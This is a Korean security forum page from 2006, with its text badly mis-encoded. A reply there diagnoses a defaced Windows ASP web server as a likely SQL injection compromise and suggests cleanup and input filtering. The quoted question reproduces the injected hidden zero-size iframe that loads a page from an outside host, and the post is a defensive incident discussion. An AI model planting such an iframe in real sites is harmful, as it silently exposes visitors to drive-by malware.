Å©·¡Å· ÇÇÇØ

 423, 1/22 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   ¸Û¸Û
   http://hackerschool.org
   [re] À©µµ¿ì À¥¼­¹ö ÆÄÀÏ º¯°æ(ÇØÅ·)¿¡ °üÇÑ ¹®ÀÇÀÔ´Ï´Ù..

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_recover&no=240 [º¹»ç]



soarrr´Ô ¿À·£¸¸ÀÔ´Ï´Ù.

Windows + ASP °è¿­ÀÇ À¥¼­¹ö´Â ´ë´Ù¼ö°¡ SQL Injection Ãë¾àÁ¡¿¡ ÀÇÇÏ¿©
°ø°ÝÀ» ´çÇÕ´Ï´Ù.

SQL Injection °ø°ÝÀº "³ª '¿Í °°Àº Àο빮ÀÚ(quote)·Î ¼öÇàµÇ±â ¶§¹®¿¡
·Î±×¿¡¼­ ÀÌ °ªÀ» ±âÁØÀ¸·Î °Ë»ö/ºÐ¼®À» Çغ¸½Ã¸é µË´Ï´Ù.

¿Ã·Á ÁֽŠ·Î±×¸¦ º¸¸é,

GET /alumni/search/search/index.asp |25|80040e14|¿­_À̸§_'region'ÀÌ(°¡)_À߸øµÇ¾ú½À´Ï´Ù.
GET /gs/notice/view.asp seq=|25|80040e14|ÁÙ_1:_'='_±ÙóÀÇ_±¸¹®ÀÌ_À߸øµÇ¾ú½À´Ï´Ù.

¿Í °°ÀÌ SQL Injection °ø°Ý ÈçÀûÀÌ ³²¾ÆÀÖ´Â °ÍÀ» º¼ ¼ö ÀÖ½À´Ï´Ù.
À§Ã³·³ SQL error°¡ Ãâ·ÂµÇ´Â »óȲÀ̶ó¸é SQL Injection °ø°Ý¿¡ ÀÌ¹Ì Ãë¾àÇÑ
»óÅÂÀÓÀ» ¾Ë ¼ö ÀÖ½À´Ï´Ù.

Å©·¡Å· ÇÇÇØ ÈÄ¿£ ¼­¹ö¸¦ À缳ġÇÏ´Â °ÍÀÌ °¡Àå ÁÁÀ¸¸ç, WEB ¼Ò½º¿¡ ¹éµµ¾î°¡ Ãß°¡
µÇÁö´Â ¾Ê¾Ò´ÂÁö ƯÁ¤ ¹®ÀÚ¿­(CreateObject, .Run)°ú ÃÖ±Ù ³¯Â¥·Î °Ë»öÀ» Çغ¸½Ã±â
¹Ù¶ø´Ï´Ù.

±×¸®°í SQL Injection Ãë¾àÁ¡ÀÌ ÀÖ´Â ¼Ò½º´Â ASP Ä¿¹Â´ÏƼ »çÀÌÆ® µîÀ» Âü°íÇÏ¿©
"³ª '¿Í °°Àº Àο빮ÀÚ¸¦ ÇÊÅ͸µÇϵµ·Ï ÆÐÄ¡ÇÏ¼Å¾ß ÇÕ´Ï´Ù.



===============================================================================
>¾È³çÇϼ¼¿ä.. ¿À·¡°£¸¸ÀÔ´Ï´Ù..
>Àá½Ã È°µ¿ÇÏ´Ù ÀáÀûÇعö¸®´Ù ÀÌ·¸°Ô ¿°Ä¡¾øÀÌ µµ¿òÀ» ¾ò°íÀÚ µ¹¾Æ¿Ô½À´Ï´Ù..
>
>´Ù¸§ÀÌ ¾Æ´Ï¶ó.. windows ¼­¹ö 2´ë°¡ index.asp ÆÄÀÏÀÌ º¯°æµÇ¾ú½À´Ï´Ù..
>(<iframe src="http://kr.kr2cn.com/index.htm" width="0" height="0" frameborder="0"></iframe>) <- »ðÀÔ
>ÄÚµå Á¦ÀÏ ÇÏ´Ü¿¡ iframe À¸·Î Äڵ尡 »ðÀԵǾú´Âµ¥..
>º¯°æ³¯Â¥°¡ Á¦°¢±â 2005³â 12¿ù°ú 2006³â 6¿ù °æÀÔ´Ï´Ù..
>¹°·Ð »ç°í´Â ÃÖ±Ù¿¡ ¹ß»ýÇÑ°ÍÀ¸·Î ÃßÁ¤µË´Ï´Ù¸¸..(¾Æ´Ò¼öµµ ÀÖ½À´Ï´Ù..)
>
>¿ì¼± ÇÑ ¼­¹ö¸¦ º¸¸é ¾Ë¼ö¾ø´Â °èÁ¤(s-1-5-21-1454055633-2705038733-166218806..) À̶ó°í index.asp ÆÄÀÏ¿¡ º¸¾È Á¤º¸¿¡ °èÁ¤ÀÌ Ãß°¡µÇ¾îÀÖ½À´Ï´Ù..(win2003)
>´Ù¸¥ ¼­¹ö´Â 2000¿¡´Â ¾ø±¸¿ä..
>
>°¢ °¢ ÆÄÀÏÀÌ »ý¼ºµÅ¾úÀ» ¶§ ±âÁØÀ¸·Î ·Î±×¸¦ ÷ºÎÇÕ´Ï´Ù..
>¾î¶² Ãë¾àÁ¡À¸·Î °¡´ÉÇß´ÂÁö Á¶¾ðÁ» ºÎŹµå¸®°Ú½À´Ï´Ù..
>·Î±×´Â plaza.snu.ac.kr/~heeya/logs.zip  ´Ù¿î¹ÞÀ¸½Ã¸é µË´Ï´Ù..
>
>¸Û¸Û´Ô Àß Áö³»¼ÌÁÒ?? ^^ ¹®¾ÈÀÎ»ç µå¸³´Ï´Ù..
===============================================================================

  Hit : 6634     Date : 2006/09/27 03:33



    
423   ½ÇÇàÆÄÀÏ .exe ÆÄÀÏÀÇ ¼Ò½º¸¦ º¼¼öÀÖÀ»±î¿ä??[14]     ear0111
08/30 18870
422       [re] [re] ¸®´ª½º Å©·¡Å· Á¶¾ð ºÎŹµå¸³´Ï´Ù..[22]     ¸Û¸Û
06/28 10093
421   ÇØÅ·°ü·Ã ¹®ÀÇ µå¸³´Ï´Ù..[4]     soarrr
05/23 8971
420   EFS key °É¸° ÆÄÀÏ º¹±¸Çϱ⠠   voicebe
03/31 7532
419   ¾ÆÀÌÇǾîÅÃ[4]     D4rk_Angel
08/29 7261
418   NetBot Attacker¿¡ ´ëÇÏ¿©...[11]     min0923
08/05 7257
417   À©µµ¿ì7 ½Ã°£°ú ³¯Â¥°¡ ¸ÅÀÏ ¹Ù²î´Âµ¥¿ä[4]     gkswls123
08/31 7140
416   Å°·Î±× ã´Â¹æ¹ý[5]     songlee0101
01/05 7051
415   ÀÚ²Ù Å°º¸µå°¡ Áö¸¾´ë·Î ´­·Á¿ä[8]     komqkqh
01/24 6907
414     [re] ¾Æ½Ã´ÂºÐ ¾Ë·ÁÁÖ¼¼¿©....³Ý¹ö½º 1.7[2]     ¼ÒÀ¯
10/27 6690
413   Çü´Ôµé ÇØÅ·(?)À̶ó±âº¸´Ü °¨½Ã´çÇÏ´Â °Å °°Àºµ¥¿ä..[9]     deepers
05/12 6638
    [re] À©µµ¿ì À¥¼­¹ö ÆÄÀÏ º¯°æ(ÇØÅ·)¿¡ °üÇÑ ¹®ÀÇÀÔ´Ï´Ù..     ¸Û¸Û
09/27 6633
411   Áß±¹ syn_sent[3]     ¼Û½Ã
11/05 6146
410   ¸ð¸£´Â ip°¡ Á¢±ÙÇؿԴµ¥ Á» ºÁÁÖ¼¼¿ä[4]     Gloverman
01/09 6029
409   ¾Æ´Â ´©´Ô²²¼­ ½ºÅäÅ·(?)´çÇϽô µí Çѵ¥¿ä..[3]     dokokou
01/22 5985
408   Ä£±¸ÄÄ ÇØÅ·ÇÒ·Á¸é..¤»¤»[20]     ysjplus
03/14 5971
407   mysql dbÇØÅ·...[4]     soong2002
12/11 5935
406   [À͸íó¸®µÈ °Ô½ÃÆÇ¿¡ ¿Ã¸° »ç¶÷ IP³ª ID ¾Ë¾Æ³»´Â ¹æ¹ý][2]     wanemoon
10/27 5928
405   ¿©±â¿¡ ½áµµ µÇ´ÂÁö ¸ð¸£°Ú´Âµ¥¿ä www.xindpkz.com ÀÌ°Í ¶§¹®¿¡¿ä ³»¿ëÀÖ½À´Ï´Ù.[4]     nmy89
04/10 5826
404   ¾î..ÇØÅ· ´ë»ó¸»Àä..[14]     0doctor0
08/06 5769
1 [2][3][4][5][6][7][8][9][10]..[22]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org